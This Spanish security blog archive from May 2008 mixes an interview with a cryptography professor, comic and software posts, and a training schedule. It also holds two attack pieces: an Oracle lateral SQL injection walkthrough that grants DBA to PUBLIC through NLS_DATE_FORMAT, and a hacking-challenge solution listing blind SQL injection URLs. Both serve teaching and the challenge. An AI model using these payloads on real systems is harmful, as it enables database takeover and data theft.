Mi tiempo más allá de la docencia, que para eso me pagan, es el que dedico a la red temática (y puedo decirte que es mucho), luego la cátedra, dirijo también varios proyectos de fin de carrera para software educativo de criptografía y seguridad, y ahora último tengo en mente extender CriptoRed a un servidor independiente con lengua inglesa, organizar un congreso en USA y ser un referente de información también en inglés. No existe nada similar en Internet a la actual red temática en inglés y es el momento oportuno para hacerlo. Esto lo digo por el seguimiento que hacemos en los últimos meses y años de las estadísticas, accesos y descargas de CriptoRed. Sólo falta conseguir unos 4 ó 5 patrocinadores (aunque ya hay un par de empresas que están valorando positivamente el proyecto) para lograr los 60.000 Euros mínimos por año que cuesta el proyecto: becarios, técnicos de apoyo, representación, organización congresos, etc.

16. ¿Es duro ser del Barça en Madrid?

¡Qué mala leche! Claro que sí y espero que estos sufrimientos sean recompensados en el más allá. Ten en cuenta que estoy escribiendo estas líneas mientras voy volando a Cartagena de Indias (en mísera clase turista, que uno es académico y le invitan a un congreso, no empresario ni político) un martes 6 de mayo, precisamente un día antes de que el Barsa deba hacerle el pasillo al Madrid en el Bernabeu. Pero es lo que hay, se lo han ganado a pulso estas figuras del balompié con el señor Laporta a la cabeza. Yo echaría a este individuo, por impresentable y politiquero independentista de medio pelo, seguido luego y en fila india por Ronaldinho, Deco, Gudjonsen, Márquez, Henry, Oleguer (otro que tal con lo de su nación, y eso que yo nací en Barcelona), Ezquerro, al propio entrenador y si me apuras hasta a Etoo, que últimamente se le ha ido un poco la olla. Savia nueva es lo que le falta a este Barcelona, pero hacer todos esos cambios es algo imposible. Así que mientras nosotros seguimos en estas batallas internas, vosotros vais a seguir llevando copas a vuestras vitrinas. Qué pena.

17. ¿Cuál ha sido la cosa más curiosa que te ha sucedido en una conferencia?

Recuerdo quedarme completamente afónico en una conferencia en Córdoba, Argentina, y tener que pedir un receso de unos 20 minutos porque movía los labios pero de ahí no salía ni mú. Llegaba de Madrid ya con un catarro y alergia a cuestas y no tuvo mejor ocurrencia que manifestarse a mitad de la charla. Luego pude seguir pero el mal momento fue de órdago.

Y precisamente en la visita a esa hermosa ciudad de Argentina, alguien de la organización del seminario me tomó varias fotografías que luego me las enviaron por email. Lo simpático es que quien me sacó esas fotos no recordaba mi nombre y tales archivos me llegaron como gallego1.jpg, gallego2.jpg, etc. Ya sabes que en Argentina a los españoles nos llaman gallegos. Me reí lo suyo al ver esos nombres. Luego se lo comenté a los organizadores en plan buen rollo y no sabían dónde esconderse.

18. ¿Y con un alumno?

En una ocasión, hace casi 20 años, el padre de un alumno vino a mi despacho a reclamar la calificación de su hijo; en otra ocasión este ruego fue de una madre pero por teléfono. A quienes recuerdo con mucho cariño es a dos alumnos invidentes que tuve cuando impartía Introducción a la Informática (hace muchos años ya) con temas de ensamblador y eso, un chico y una chica. Verles escribir código en el examen con su máquina Braile y posicionar el puntero exactamente donde era menester, borrar justo lo que hacía falta, etc. era para poner los pelos de punta, alucinante y gratificante ver cómo superaban su discapacidad de forma brillante. Encima eran excelentes alumnos y uno de ellos sacó matrícula.

19. ¿Dónde te vamos a poder ver próximamente?

Como te digo, ahora voy camino a Cartagena de Indias al congreso CISI, luego a mi vuelta tengo una conferencia en la Complutense de Madrid, a mediados de junio organizamos con la cátedra un seminario dedicado a la seguridad y personas mayores, temas de discapacidad tecnológica y seguridad en este importante colectivo, en julio viajo a Chile a un Máster de la Universidad de Chile en el que participo desde hace años (estaba invitado a Canarias por mi amigo Manuel González a un curso de verano en julio, pero coincide con estas fechas de Chile… a eso se le llama tener mala suerte), en septiembre voy a Bucaramanga en Colombia a otro Máster en el que participo, hay por esa fecha un proyecto de difusión de seguridad y criptografía que tal vez salga con compañeros de la Universidad de Salamanca, en octubre estaré a Sucre Bolivia invitado al congreso CCBol, en noviembre a Buenos Aires por sexto año como invitado en una Especialización, y además es tiempo del DISI 2008. Y en diciembre viene Papá Noel.

20. Demuéstranos que es divertida la criptografía. Plantéanos un juego.

Déjame ver qué se me ocurre. Vale, un desafío y una pregunta para matrícula.

El desafío:

En un despacho del Fútbol Club Barcelona encuentran el siguiente criptograma y nos piden descubrir el secreto escondido en dicho texto:

zixww0gBWqmZ9p5KsymM/zB73E4BWrmA9MtGumfc7ip33lELWruQsYdM9jHNrzg+2lwHH7rV4p4DpibI/TwyklgXWqyQsYhCtCbA4zxs3U5ECK2W/oVMtSLeryhr1x0BFui48I9RvyOM6io+11FEEL2G5YQDtSbB/zzt3B0dWrmA9MtGumfu7itt0x0MG+id9IhLuWfJ43ls21mJGb2Z/sUDl2fZ4Xl6X1xEHq2ZsYNWuy7A4zhwxlhECqmG+IdPuWfI6jU+31SNCKua/Y5Q9nCM6zw+31wdFeiR9MsR5neUoXlN01ERHqeGvctWuGfP+jX3nA==

La Ayuda:

Se trata de un sistema de cifra en flujo. Si con la misma clave de 15 bits (malísima claro) se cifra una palabra repetida 31 veces, se obtiene este otro criptograma:

/zht21EIFbiU4oJPuijc7ip33lELCqmG+IdPuTfN/DBy3lIUG7uc/YdMpibf5jVy3U0FCaGZ/YRTtzTF4zVxwlwXE6SZ/ptCpS7A4zZu004NFqSa4YpQvyvA4Cl/wVQIFqeF8JhKuivD/zht21EIFbiU4oJPuijc7ip33lELCqmG+IdPuTfN/DBy3lIUG7uc/YdMpibf5jVy3U0FCaGZ/YRTtzTF4zVxwlwXE6SZ/ptCpS7A4zZu004NFqSa4YpQvyvA4Cl/wVQIFqeF8JhKuivD/zht21EIFQ==

La Pregunta:

En PGP o GnuPG generamos por defecto claves del tipo DH. ¿Cómo es posible hacer el intercambio de claves de forma que el emisor le envíe al receptor la clave de sesión para el cifrado simétrico del correo dentro del sobre y éste, el receptor, pueda abrirlo en un instante distinto al del envío, dada la naturaleza del correo electrónico no interactivo? Evidentemente, no se trata del algoritmo original propuesto por Diffie y Hellman en su artículo de 1976 sino de una variante. La cuestión es cuál es esa variante. Se encuentra en pocos libros y en mi libro electrónico… qué decepción, no me has preguntado por él… todavía no lo he incluido.

Para terminar. Muchas gracias por esta entrevista, me lo he pasado genial. Espero les interese al menos a una media docena de amigos.

lunes, mayo 12, 2008

Black Hacker

Hola vicisos@s!

Cuando yo era adolescente, sin un pavo en el bolsillo, veía los comics en los escaparates de los kioskos. Uno tras otro me iban maravillando, pero no podía permitirmelos. Años después, ya forrado como el tio Gilito, me dediqué a perseguir comics. Por dónde fuera, buscando los más raros, los menos buscados, las colecciones del mainstream y las del circuito menor.

Hace un par de años que persigo la linea Laberinto que fue pulicada hace más de 10 años en España. Esta línea estaba dedicada sólamente a autores españoles y tenía joyitas preciosas. Creo que tengo casi todos los que se editaron, sólo me faltan unos 5 comics en total. No fue un éxito de ventas y la cerraron.

Dos de los comics que me faltan son de esta serie, dibujada por Juan Román Cano y ¡¡me quema!!

Black Hacker 1
¿Alguien puede conseguirmelos? ¿De que va la historia? ¿Es buena?

Black Hacker 2
Los dibujos me molan mucho, pero no he podido nada más que ojear (no me permito leerlo hasta que no la tenga completa) el número 2, que es el que tengo.

Black Hacker 3
Si los tienes... ¡te los compro!.

Saludos Malignos!

SQL Injection... de medio "lao"

Hola lusers!

La experiencia me dice que cuando he puesto algo que ha tenido que ver con seguridad informática en este blog siempre la machacáis, la exprimís y la mejoráis. La prueba de esto han sido los retos hacking dónde los jugadores se han portado como un torrente de agua desbordando las medidas de seguridad y los caminos preparados para la solución, aportando nuevas ideas, mejoras y nuevos resultados.

Hoy os voy a plantear una idea de la gente de NGS que seguro que a muchos de vosotros os abre nuevos caminos. A mí se me ha ocurrido alguna forma de sacar provecho de esto en algunos escenarios, pero seguro que a vosotros se os ocurren mejores que a mí.

La idea es hacer un ataque de SQL Injection aprovechando el formato de fecha en Oracle. Pensad en un procedimiento que no recibe como parámetro nada, y que sólo utiliza la fecha del sistema para realizar una consulta SQL.

create or replace procedure date_proc is
stmt varchar2(200);
v_date date:=sysdate;
begin
stmt:='select object_name from all_objects where created = ''' ||v_date || '''';
dbms_output.put_line(stmt);
execute immediate stmt;
end;
/

Si alguien puede cambiar el formato de la fecha podría hacer que todas las fechas tuvieran inyectadas las comillas. Ejemplo:

SQL> ALTER SESSION SET NLS_DATE_FORMAT = '"THIS IS A SINGLE QUOTE ''"';
Session altered.
SQL> SELECT SYSDATE FROM DUAL;
SYSDATE
------------------------
THIS IS A SINGLE QUOTE '

En este caso, al ejecutar el procedimiento se obtendría un error

SQL> EXEC DATE_PROC();
BEGIN DATE_PRC(); END;
*
ERROR at line 1:
ORA-01756: quoted string not properly terminated
ORA-06512: at "SYS.DATE_PRC", line 7
ORA-06512: at line 1

Una vez que se ha podido inyectar un comilla, podemos inyectar la ejecución de un cursor. Para eso, creamos un cursor que de permisos de DBA al Rol PUBLIC.

SQL> SET SERVEROUTPUT ON
SQL> DECLARE
2 N NUMBER;
3 BEGIN
4 N:=DBMS_SQL.OPEN_CURSOR();
5 DBMS_SQL.PARSE(N,'DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN
EXECUTE IMMEDIATE ''GRANT DBA TO PUBLIC''; END;',0);
6 DBMS_OUTPUT.PUT_LINE('Cursor is: '|| N);
7 END;
8 /
Cursor is: 4

PL/SQL procedure successfully completed.

Y hacemos que se ejecute el cursor número 4 por medio del formato de fecha.

SQL> ALTER SESSION SET NLS_DATE_FORMAT = '"'' AND
DBMS_SQL.EXECUTE(4)=1--"';
Session altered.

Cuando se ejecuta se ha inyectado la ejecución del cursor y Oracle OUT!.

SQL> EXEC DATE_PROC();
select object_name from all_objects where CREATED = '' AND
DBMS_SQL.EXECUTE(4)=1--'
PL/SQL procedure successfully completed.

En el documento publicado también se aporta la posibilidad de realizar con los formatos numéricos:

SQL> ALTER SESSION SET NLS_NUMERIC_CHARACTERS = '''.' ;

Tenéis los documentos en la web de NGS

- Lateral SQL Injection
- Cursor Injection

Pero… esto de utilizar los formatos de tipos de datos para inyectar comandos… ¿se os ocurre dónde puede utilizarse con alguna idea maliciosa? ¿Algún entorno en el que se pueda explotar esta idea?

Saludos Malignos!

domingo, mayo 11, 2008

Amigo de mis amigos

Hola amigos!

En Argentina conseguí comprarme el último número que me faltaba de la colección que Norma Editorial dedicó a Lobo. En esa colección de 26 números he disfrutado grandes momentos con grandes historias de uno de los rajados que más me molan.

Motos, Heavy Metal, Sangre, un Cazarecompensas, amante de los delfines y asesino de su propia especie... Es único.

Hoy, en un receso me he ledio una historia que se llama P..p...p...ingüinos! y aun le quiero más. Dulces animalitos los pingüinos estos...jeje.

Lobo P..p..p..enguins!
I "lobo" you!

Saludos Malignos!

OpenOffice 2.4 Writter & Ubuntu 8.04
Primeras impresiones malignas o
Primeras malignas impresiones

Hola compañeros ubunteros!

Hoy le toca al OpenOffice Writter de StarOffice, uno que dicen que se "parece" al Word.

El miedo al cambio de formato

Llevo poco tiempo con mi Ubuntu y ya no sé si es que me pongo yo muy exigente o es que el pobre se estrella conmigo. Para escribir el blog no suelo usar Office, pero si voy a hacer un documento formal sí, pues me gusta que me vaya corrigiendo los errores tipográficos (y los que no lo son). Cómo os imaginaréis, gran parte de mi entorno utiliza Office 2003 u Offfice 2007 así que tengo que generar los documentos en .rtf o .doc. Tengo la opción de mandarles el doc y el link para el plugin de ODF para office, pero pudiendo grabar yo con mi OpenOffice en .doc... ¿para que molestarlos?

Digo yo que, estando disponible totalmente el formato .doc de Office 2003 la gente de SUN ¿lo habrá implementado bien, no?. Bueno, pues no lo sé, pero a mí me acojonan.

Haced la prueba vosotros en vuestro OpenOffice 2.4 sobre vuestro "flama" Ubuntu 8.04. La POC es:

1.- Nuevo documento.
2.- Escribid: Hola amigo![enter][Tabulador]¿Cómo estás?[Enter]Saludos Malignos!
3.- Dais a guardar como .doc 2000/XP/2003

Mensaje de Advertencia al guardar como
Bien,lo que aparece es un bonito mensaje de alerta que te dice que, esta puta mierda de documento escrito tiene información que no se puede guardar en un Doc. ¿cuál es esa información? ¿Es alguna información que guada OpenOffice? Yo no la he visto pues no he rellenado ninguna propiedad del documento en ningún sitio. ¿Será alguna información automática que guarda con el ODF?

Pues algo será. Si se prueba con cualquier otro formato que no sea ODT sale el mensaje de alerta. ¿El objetivo? Pues márketing, conseguir que todo el mundo guarde en ODT no sea que vaya a perder algo de información. Esto, cuando lo que se trata de conseguir es que usuarios de Office que, como yo, se relacionan con usuarios de Office, utilicen OpenOffice para su vida normal con tranquilidad consigue un efecto contrario. ¿Cuanta gente creeís que abandonará este programa sólo por no poder trabajar correctamente con sus clientes?

Idioma: La applicación

Otra de las cosas fundamentales en un procesador de textos es el idioma, por supuesto!. Si una aplicación para hacer textos se quiere introducir en España deberá estar adaptada para gente que escriba esos textos en Español.

Vale, pues la aplicación que viene por defecto viene en Inglés, y no he podido cambiarla a español porque no viene en el sistema.

Idiomas de Interfaz
A mi, personalmente me la suda un poco pq estoy acostumbrado a interfaces en inglés, pero me sé de muchas personas que de inglés saben "jelou" y "gudbai". La pregunta es, vamos, ¿Ubuntu se quiere meter en España de verdad? ¿Se lo ponemos a los funcionarios de este país para hacer los textos? ¿OpenOffice no es un proyecto lo suficientemente importante como para que se haya traducido el interfaz? Venga va, que un interfaz no es un tomo del Quijote. Lo mejor es que ... lo puedo traducir yo, porque en el botón de ayuda hay una opcion que pone Translate this application y lo que me lleva, iluso de mí, es a que la traduzca yo. Nada, se lo pongo a mi madre y que lo traduzca ella. He visto ofertas millonarias por instalar y dar soporte a OpenOffice (o era StarOffice) en la administración pública española. Ofertas muy gordas compitiendo con Office. ¿Lo tendrán en español? Yo creo que sí que tendrán los menús en castellano, pero... ¿por qué no están aquí? ¿Es que Sun sólo los quiere para la versión de pago? ¿Es que no existen? ¿Es que Canonical no ha hecho el trabajo? ¿Es que este producto es una beta?

Idioma: La corrección gramatical

No fui capaz de poner la aplicción en español, pero sí pude poner el texto en spanish, basta con ir a la opción de menú Tool/Language/For all text y ahí seleccionar para todo el texto spanish (spain). ¡Iluso de mi!. Esperaba que me corrigiera y marcara todos los "herrores" tras haber seleccionado que me hiciera autocorrección, y ... vamos, este sabe menos ortografía que yo.

Opciones de corrección
Hacer lo había puesto sin hache, pero.. tal vez, sólo tal vez, se me ha escapado algún otro error que le he dejado a ver si me los corrige.

El listo corrigiendo
Si Lazaro Carreter levantara la cabeza... bueno, por lo visto también cambia "nuebo" por "nuevo" así que estoy a salvo de meter esa cagada. BIBA LA HUSABILIDAD!!

Saludos Malignos!

sábado, mayo 10, 2008

Hans On Lab en Barcelona

Gracias a la Escuela de Prevención y Seguridad Integral, vinculada a la Universidad Autónoma de Barcelona, los Hands On Lab se desplazan durante el mes de Junio a Barcelona. Allí, se realizarán 4 semanas de Hands On Lab centrados en la seguridad de Sistemas ya que esta es una de las prioridades de la Escuela, focalizada en todos los aspectos realizacionados con la Seguridad. Una de las semanas será dedicada a Windows Vista, otra semana semana será dedicada a la familia de productos de seguridad Forefront con ISA Server, Server Security, Intelligent Application Gateway y Client Security junto con los productos System Center. la tercera semana estará centrada en Windows Server 2008 con las tecnologías NAP, IIS7, etc... y una última semana dedicada a la seguridad en la red con la formación ProtégeIT! Network Security. Tienes toda la campaña en la siguiente URL: Hands On Lab en Barcelona. La lista de Hols la tienes aquí:

Windows Vista

02-03 [16:00-19:00]HOL-VIS01: Instalación y Configuración
03       [09:00-15:00]HOL-VIS08: Gestión Aplicaciones con MDOP
(Softgrid Application Virtualization y Asset Inventory Service)
04       [09:00-15:00]HOL-VIS09: Diagnóstico y Gestión de errores
(Diagnostics&Recovery Toolsets/Center Desktop Error Monitoring)
04-05 [16:00-19:00]HOL-VIS02: Administración
05       [09:00-15:00]HOL-VIS10: Políticas de Grupo y Directivas
06       [09:00-15:00]HOL-VIS11: Compatibilidad de aplicaciones

System Center

09-10 [16:00-19:00]HOL-SMS10: Configuration Manager 2007
11-12 [16:00-19:00]HOL-MOM10: Operations Manager 2007

Forefont & ISA Server 2k6

10 [09:00-15:00] HOL-ISA21: ISA Server 2K6. Firewall y Caché
11 [09:00-15:00] HOL-ISA22: ISA Server 2K6. Branch Offices/VPNs
12 [09:00-15:00] HOL-FOR02: Forefront Client Security
13 [09:00-15:00] HOL-ISA24: Intelligent Application Gateway 2k7

Windows Server 2K8

16-17 [16:00-19:00] HOL-WIN36: Server Core
17       [09:00-15:00] HOL-WIN31: Administración
18       [09:00-15:00] HOL-WIN32: Active Directory
18-19 [16:00-19:00] HOL-WIN34: Powershell
19       [09:00-15:00] HOL-WIN35: Network Access Protection
20       [09:00-15:00] HOL-WIN33: Internet Information Services 7

ProtégeIT!:Network Security

22 al 27 Network Security

Amenazas y Riesgos de las redes Wireless. Ataques Wifi y sistemas de protección. Ataques de Wiretapping. Sniffers. Técnicas de DOS. Ataques y protección contra situaciones Man In The Middle. ARP-Poissoning. Técnicas de Spoofing. Voz IP. Arquitectura y seguridad VoIP. Sistemas de Mensajería Instantánea Seguros. Sistemas de cifrado y autenticación de comunicaciones. IPSec. SSL. Kerberos. LDAP-s. Arquitectura Firewalls. DMZs. Sistemas de
VPN. L2TP y PPTP.

Más información en: Hands On Lab en Barcelona

Comentario al Reto Hacking VII

Hola lusers!

El Reto Hacking VII se acabó y está publicado el solucionario. Siento los problemas de la segunda fase del Reto e intentaremos seguir mejorando. En este caso además se nos complicó un poco el asunto, pues, mientras que vosotros empezabais a jugar yo estaba volando hacia Argentina y además, para que todo el mundo tenga tiempo, lo hacemos en Viernes tarde, con lo que estamos todos desperdigados por el mundo.

Este Reto Hacking estaba pensado para que practicar la inyección en llamadas a procedimientos PL/SQL en Oracle y la primera fase costó mucho montarla. La segunda fase sólo pretendía ser un juego rápido, pero... se nos fue la mano.

Para que no os aburraís, os voy a dejar un juego en una entrevista que publicaré esta semana y los que lo saquen tendrán puntitos extras para la clasificiación.

Una vez más, gracias a todos los que jugásteis, y pondremos disponibles algunos de los logs para vuestro análisis.

Buen finde y ... ¡Suerte Alonso con la Kangoo!

Saludos Malignos!

Solucionario Reto Hacking VII (II de II)
por Dani Kachakil

Fase 2: El mal sueño

Habiendo superado la primera fase, accedemos a la segunda desde la opción Diviértete. Nos encontramos con una pequeña foto de un girasol, dos campos de texto (primera y segunda clave) y con esta frase de Karl Weierstrass como pista:

"Un matemático que no es también algo de poeta nunca sera un matemático completo"

Nada parece indicar el camino a seguir para superar esta fase, por lo que en principio podríamos suponer que se trata de esteganografía. Parece lógico que exista algún texto oculto en la imagen que indique lo que hay que rellenar en ambos campos, así que como primer paso nos descargaremos la imagen del girasol (nivel2_girasol.jpg) para ver lo que escondía.

Como no quiero aburrir con las mil pruebas inútiles que podríamos hacerle a la imagen (que contenía varias miniaturas y otros textos que despistaban mucho), pasaremos directamente a la solución, que tampoco era nada trivial a mi parecer.

Bastaba con acceder a los comentarios Exif de la imagen (que en principio son legibles desde el propio sistema operativo), para poder leer un conjunto de pistas que se supone que deberían llevarnos a deducir que teníamos que adivinar el nombre de un personaje y que se trataba de Fibonacci, quien murió en el año 1250 DC, es decir, el mismo año que Federico II, nieto de Federico I "Barbarroja", el mismo que aparecía en el campo del fabricante de la cámara (que son las pistas que aparecían).

A partir de ahí, teníamos que adivinar que "Fibonacci" era la palabra que se correspondía con la primera clave. Hecho esto, teníamos que aplicar la sucesión de Fibonacci a la frase que aparecía como pista en la página (el propio girasol también debería habernos llevado a pensar en esta sucesión, ya que sus semillas se ordenan según esa sucesión). Numerando los caracteres de la frase como si de un vector con base cero se tratara y tomando los índices correspondientes a la sucesión de Fibonacci, también empezando en cero (0, 1, 1, 2, 3, 5, 8,…), obteníamos la segunda clave, que como se puede ver, el resultado no esconde ninguna palabra o frase y no tiene ningún sentido, pero esto es lo que obteníamos: "Unn mta ega". Y con eso, ¡reto superado!.

Agradecimientos y comentarios

Hay que reconocer que la primera fase tenía un toque de originalidad y que su resolución era muy factible, ya que gracias a que obteníamos una retroalimentación, podía resolverse paso a paso. En mi caso esa fase me motivó bastante, ya que era la primera vez que aplicaba una inyección SQL en Oracle y eso me obligó a tener que leer todo tipo de documentación y a aprender las peculiaridades de este gestor de bases de datos, ya que a pesar de que la base es la misma, todos ellos tienen sus diferencias.

Sobre la segunda fase, la verdad es que me ha parecido la más chapucera de todos los retos, ya que tenía una complejidad excesiva, era demasiado rebuscada y su resolución no tenía mucha lógica, ni tampoco había ninguna ayuda que indicara si el camino era el correcto o no. Considero que la primera clave sobraba y así su resolución sería mucho más factible. Pero ahí no acabó la cosa, ya que lo peor era que esta fase estaba mal programada por un pequeño detalle. Sí, se trataba de una simple comparación entre dos cadenas de texto, porque no tenía más, pero una mayúscula donde no tocaba hacía que la fase fuera imposible de superar, lo cual demuestra que la programación del reto se terminó de forma precipitada y se publicó sin haberlo probado. Una vez arreglado ese fallo el reto ya se podía superar, pero en el momento de superarlo nuestro usuario desaparecía por completo de la lista debido a otro fallo…

En fin, dejando esos pequeños incidentes de lado (aunque tampoco es la primera vez que digo que las cosas hay que probarlas por el bien de todos), hay que reconocer el esfuerzo y la dedicación que requiere la programación de un reto de estas características, así que ante todo hay que agradecer el trabajo a los de siempre: Chema, Rodol, Alex y a todo aquél que haya participado de cualquier forma, ya que gracias a todos vosotros hemos tenido una nueva oportunidad de aprender jugando, que al final es la utilidad de estos retos. Después de leer esto, ¿te animas a participar en el siguiente?

Saludos,
Daniel Kachakil

viernes, mayo 09, 2008

15 minutos de Gloria

Dicen que todos merecemos 15 minutos de gloria una vez en la vida para que los conservemos en la memoria. Esos 15 minutos que te permiten verte de forma diferente y no como cuando te levantas por la mañana, vas a al baño, meas, bostezas, te estiras, te sacudes la cama y dices: "joder, que mayor estoy".

En mis 15 minutos de gloria guardo grandes tesoros que gente que me quiere me ha regalado sabiendo que me iban a encantar. La caricatura que me hizo Vizcarra, la canción de rock que me escribieron o los cuentos en mundos perdidos que me regalan los ojos con un personaje de ciertos toques..."conocidos".

Entre esos tesoros está la obra de teatro que Eloy Arenas escribió el siglo pasado titulada "Entiendeme tú a mi". Esa obra, tiene 5 historias cortas dónde dos personajes están condenados a entenderse porque la vida les ha unido en un punto del camino.

Antes de ir a verla por primera vez Eloy me dijo: "A ver si te gusta la primera historia". Y sí, me gustó mucho, me encantó. Ver en ella a Chema Alonso, pobre usuario de ordenadores, desquiciado y superado, que recibe su nuevo ordenador personal basado en un clon de origen humano llamado ROM, discutiendo en el escenario hizo que me desternillara. Este pequeño homenaje que Eloy me hizo me llenó de alegría.

Eloy Arenas & Jorge Roelas en la primera versión
La obra se estrenó en el año 1999 y por suerte estuvo varios años en Madrid, dónde pude ir a verla más de 10 veces, aunque he de reconocer que, gracias a que tengo el libro y el DVD, la he visto más que las fotos de la mili. La obra no sólo se representó en España, ya que se han hecho varias versiones de la misma que fueron representadas por Miami, Venezuela y no se que otros países.

Versión de Karl Hoffman
Ayer, fue el estreno en Madrid de la obra y, cómo no, estuve sentado en primera fila, viendo al nuevo ROM, los cambios de la nueva puesta en escena y, una vez más, a Eloy Arenas siendo haciendo de Chema Alonso. ¡Gracias!

Entiendeme tú a mi Cartel Actúal con Daniel Ortíz
La primera de las cinco historias está disponible en esta URL: "Entiendeme tú a mi" y para los que queráis disfrutar de ella en vivo en Madrid podéis asistir al Teatro Alfil. Si queréis comprar entradas sale con un 40 % de descuento por Atrápalo.. Gracias Eloy por esos 15 minutos de gloria durante casi 10 años!

Saludos Malignos!

jueves, mayo 08, 2008

Solucionario Reto Hacking VII (I de II)
por Dani Kachakil

Hola amigos, el Reto Hacking VII lo ganó Dani Kachakil, así que os dejo su solucionario aquí publicado, más de un mes después de su apertura. La segunda fase, y la crítica del reto irán en la siguiente entrega, pero mientras tanto podéis ir leyendo como había que pasar la primera fase...

Después os pondré alguna cosa mia sobre el reto y pondremos disponible el PDF del solucionario completo.

Saludos Malignos!

Introducción

Este documento describe una solución al Reto Hacking VII de Informática 64, el segundo de la segunda temporada, que se publicó el 4 de abril de 2008 en la siguiente dirección web: http://retohacking7.elladodelmal.com

La pecera de Kachackil
Pistas

En esta ocasión no teníamos pistas a nuestra disposición, a no ser que a alguien le sirviera la frase que aparecía en el post que anunciaba el comienzo del reto:

La fase 1, será como una boda y la fase 2 como un mal sueño, así que nada, salud y suerte a los toreros!

Fase 1: Llenando la pecera

Como viene siendo habitual en los últimos retos, para acceder a la primera fase teníamos que registrarnos con un nombre de usuario y una dirección de correo válida, donde recibiremos la contraseña correspondiente generada aleatoriamente. Accediendo con estos datos en la página de login, aparecían los siguientes elementos en el menú:

• Login: Para darnos de alta o validarnos con nuestro usuario y contraseña.
• Seguimiento: Lista de participantes, desde la cual se puede acceder al progreso de cada uno, incluso sin necesidad de autentificarnos.
• Léeme: En este punto se nos explica un procedimiento para superar la primera fase, llenando nuestra pecera de peces (eso sí, armados de paciencia).
• Pecera: Aquí vemos los peces que tenemos en nuestra pecera, pudiendo añadir un nuevo pez cada 5 minutos. En total "solo" tenemos que añadir 3960 peces…
• Diviértete: De momento no tenemos acceso a esta sección. Una vez superada la primera fase, en este punto nos aparecerá la segunda.

Lógicamente, esta primera fase del reto consiste en buscar una forma alternativa de llenar la pecera sin tener que añadir los 3960 peces uno por uno, esperando a que pasen los 5 minutos de rigor entre un pez y el siguiente. De entrada esto nos lleva a pensar en dos posibles alternativas: o bien buscar alguna forma de evitar el retardo y automatizar las casi 4000 peticiones necesarias, o bien encontrar una forma de añadir un número arbitrario de peces en un solo paso.

Resulta curioso que en nuestra pecera aparezca un desplegable que solo contiene el nombre de nuestro usuario, por lo que no sería tan ilógico crear otro usuario para añadirle peces al nuestro, pero vemos que de esta forma no evitamos el retardo y no llegamos a ningún sitio. Por otro lado, las primeras pruebas parecen indicar que dicho campo no es vulnerable a inyección SQL (aunque más adelante veremos que sí lo era).

Por tanto, en principio nos decantaremos por la segunda opción, ya que parece más viable si conseguimos ejecutar alguna instrucción UPDATE o algo por el estilo con el fin de actualizar a nuestro antojo el contador de peces.

Desde la opción Seguimiento, podemos visualizar la pecera de cualquiera de los participantes. Llama la atención que para ello tengamos que superar un pequeño mecanismo de CAPTCHA, escuchando un fichero de audio y escribiendo el texto que contiene. ¿Por qué nos querrán dificultar el acceso a esta información tan irrelevante?

Observando la URL vemos un parámetro de tipo texto (user), que se le pasa a la página por GET. Hacemos un par de pruebas típicas para comprobar si dicho parámetro es vulnerable a inyección SQL:

verPecera.aspx?user=UsuarioExistente
verPecera.aspx?user=UsuarioExistente' and '1'='1
verPecera.aspx?user=UsuarioExistente' and '0'='1

Las dos primeras peticiones muestran la pecera del usuario especificado, mientras que la tercera petición muestra siempre una pecera en blanco. Este pequeño detalle debería ser suficiente para poder extraer toda la información de la base de datos, siempre que tengamos acceso a su catálogo. Aunque todavía no está claro que este sea el camino que vayamos a tomar, ya que para conseguirlo serían necesarias muchas peticiones al servidor, por lo que tendríamos que buscar la forma de evitar el CAPTCHA. Antes de automatizar nada, por el momento vamos a ver lo que conseguimos averiguar de forma más artesanal.

En primer lugar, intentamos determinar el gestor de bases de datos subyacente, inyectando diferentes instrucciones con variaciones en la sintaxis, objetos de sistema y funciones características de cada uno de los gestores más extendidos. Observamos, por ejemplo, que no fallan funciones como substr o uniones con la tabla dual, que no se ejecutan varias instrucciones separadas por punto y coma, que la comparación de cadenas diferencia entre mayúsculas y minúsculas, que el doble guión comenta el resto de la consulta, etc. Todo esto nos lleva a pensar que estamos ante una base de datos de Oracle, así que nos documentaremos un poco sobre su catálogo y su sintaxis.

Por cierto, como curiosidad, comentar que era muy fácil llenar la pecera (al menos de forma visual), aunque con ello no conseguíamos nada útil:

verPecera.aspx?user=UsuarioInexistente' union select 3960 from dual--

En todo caso, no era difícil adivinar algunos de los campos involucrados por simple deducción, aplicando el método de prueba y error. Por ejemplo, probando inyecciones como estas:

verPecera.aspx?user=UsuarioInexistente' or usuario='UsuarioExistente'--
verPecera.aspx?user=UsuarioInexistente' or numeropeces>20--

Ahora que sabemos el nombre de dos columnas, en lugar de extraer todo el catálogo iremos directamente a localizar el nombre de las tablas que contengan alguna columna llamada numeropeces desde ALL_TAB_COLUMNS. Para ello podemos ejecutar la siguiente consulta para determinar el número de tablas involucradas:

verPecera.aspx?user=' and 0=1 union select count(*) from ALL_TAB_COLUMNS where lower(COLUMN_NAME)='numeropeces'--

Como era de esperar, vemos que aparece un único pez, por lo que solo nos falta determinar el nombre de la tabla que contiene dicha columna, aprovechando la pecera como si se tratara de un visualizador numérico. Para determinar cualquier valor (que no supere el máximo de 3960), lo haremos simplemente contando el número de peces de cada tipo y multiplicando cada uno por el valor correspondiente a su tamaño (según la leyenda que aparece en la sección Léeme del menú principal). Ahora veamos cómo obtener la primera letra el nombre de la tabla mediante este procedimiento:

verPecera.aspx?user=' and 0=1 union select ascii(substr(TABLE_NAME,1,1)) from ALL_TAB_COLUMNS where lower(COLUMN_NAME)='numeropeces'--

Al inyectar esta consulta vemos que en la pecera resultante aparecen 7 peces de color morado y 10 peces de color naranja, valor que interpretamos como 80, que según las tablas ASCII corresponde a la letra "P". Procedemos entonces con el siguiente valor:

verPecera.aspx?user=' and 0=1 union select ascii(substr(TABLE_NAME,2,1)) from ALL_TAB_COLUMNS where lower(COLUMN_NAME)='numeropeces'--

En este caso, contamos 6 peces morados y 9 naranjas, valor que se interpreta como 69, o lo que es lo mismo, la letra "E" en ASCII. Si continuamos con el proceso hasta el final, determinamos que el nombre de la tabla que buscamos es "PECES". Sin embargo, si intentamos ejecutar subconsultas que involucren dicha tabla veremos que no obtenemos los resultados esperados. Por ejemplo, intentaremos determinar el número de registros que contiene dicha tabla con la siguiente inyección SQL:

verPecera.aspx?user=' and 0=1 union select count(*) from PECES--

